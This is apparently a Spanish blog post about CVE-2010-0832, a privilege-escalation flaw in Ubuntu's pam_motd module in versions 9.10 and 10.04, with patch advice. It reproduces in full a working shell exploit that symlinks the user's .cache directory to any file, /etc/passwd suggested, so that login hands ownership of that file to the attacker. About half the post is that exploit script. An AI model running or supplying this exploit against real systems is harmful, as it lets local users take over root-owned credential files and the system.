Fallo de seguridad en Ubunu, modulo pam_motd y su exploit

Los desarrolladores de UBUNTU corrigieron esta semana un problema de seguridad que daba a los atacantes privilegios de administrador. La vulnerabilidad presente en el módulo pam_motd permitía no solo leer contraseñas sino también modificarlas. Esto se produce en UBUNTU 9.10 y 10.04

No se trata de algo que afecte a todos los usuarios ya que no es parte de la instalación por defecto. (se trata de una aplicación que muestra diariamente un mensaje ni bien el usuario ingresa al sistema). Sin embargo quienes hayan instalado update-motd deben actualizar urgentemente ya que por la red está disponible las indicaciones para aprovechar la vulnerabilidad.

Según los desarrolladores ni GEBIAN ni otras distribuciones derivadas de ella están afectadas.

FUENTE

 

Ya se ha publicado el exploit

 

#!/bin/sh

#
# Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation)
# Date: July 7, 2010
# Author: Kristian Erik Hermansen <Esta dirección de correo electrónico está protegida contra spambots. Usted necesita tener Javascript activado para poder verla.>
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 10.04 LTS (Lucid Lynx)
# CVE : CVE-2010-0832
#
# Notes: Affects Ubuntu 9.10 and 10.04 LTS
# [Patch Instructions]
# $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i
#
if [ $# -eq 0 ]; then
echo "Usage: $0 /path/to/file"
exit 1
fi
mkdir $HOME/backup 2> /dev/null
tmpdir=$(mktemp -d --tmpdir=$HOME/backup/)
mv $HOME/.cache/ $tmpdir 2> /dev/null
echo "\n@@@ File before tampering ...\n"
ls -l $1
ln -sf $1 $HOME/.cache

echo "\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :)  File will then be owned by your user.  Try /etc/passwd...\n"

 

Via:

Compartir

One&One

SEMrush

Visitanos en: